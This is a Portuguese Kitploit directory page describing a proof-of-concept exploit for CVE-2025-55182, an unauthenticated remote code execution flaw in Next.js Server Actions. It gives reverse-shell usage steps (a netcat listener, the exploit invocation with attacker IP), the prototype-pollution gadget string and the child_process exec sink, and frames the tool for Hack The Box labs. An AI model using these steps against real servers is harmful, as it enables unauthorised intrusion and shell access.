Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182-poc — Sei que provavelmente você está aqui vindo do Hack the Box, se for o caso, sim, este realmente funciona. | Kitploit
Ferramentas/GitHubGitHub/uwugreed/cve-2025-55182-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubuwugreed/cve-2025-55182-poc

CVE-2025-55182-poc

Sei que provavelmente você está aqui vindo do Hack the Box, se for o caso, sim, este realmente funciona.

Ver Repositório
9há 20 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182-poc

Uma prova de conceito (PoC) de exploit para CVE-2025-55182, visando uma vulnerabilidade de Execução Remota de Código (RCE) não autenticada em Server Actions do Next.js.

Este exploit abusa da poluição de protótipo durante a desserialização de payloads multipart de React Server Components (RSC) para injetar comandos maliciosos no processo Node.js usando um fluxo de execução assíncrono e não bloqueante.


Recursos

  • Execução Assíncrona: Usa child_process.exec() em vez de APIs bloqueantes execSync() para evitar travamentos de thread em nós de contêiner.
  • Entrega Robusta Multi-Shell: Utiliza uma string de reverse shell via pipe FIFO compatível com POSIX para máxima estabilidade de execução em engines de contêiner Linux minimalistas.
  • Sem Dependências Externas: Construído inteiramente com a biblioteca nativa requests do Python.

Uso

1. Configure Seu Listener

Abra um terminal no seu host atacante e abra um socket listener netcat para capturar a conexão reversa de entrada:

root@kitploit:~
nc -lvnp 4444

2. Execute o Script

Forneça a URL base do alvo, o IP da interface do seu host local e a porta desejada do listener:

root@kitploit:~
python3 exploit.py <target_url> <your_ip> [your_port]

Exemplo:

root@kitploit:~
python3 exploit.py http://website.whatever:port x.x.x.x 4444

Detalhes Técnicos

O script envia um payload multipart bruto e forjado diretamente ao endpoint de roteamento da aplicação com o cabeçalho de roteamento Next-Action necessário.

Ao aproveitar assinaturas de construção de objetos via {"get":"$1:constructor:constructor"}, o engine de desserialização polui a árvore de objetos nativa. Ao processar os parâmetros acompanhantes, ele interpreta o bloco de contexto _response embutido maliciosamente como uma fila de instruções, permitindo a execução de código sob os privilégios do contexto do usuário do servidor Node em execução.

root@kitploit:~
// Vetor alvo subjacente:
process.mainModule.require('child_process').exec('your_payload_here');

⚠️ Aviso Legal

Este script foi criado estritamente para fins educacionais, testes de segurança autorizados e captura de flags vulneráveis em laboratórios como Hack The Box. O autor não é responsável por qualquer uso indevido, invasões não autorizadas de sistemas ou danos causados por esta ferramenta.

Baixar ferramenta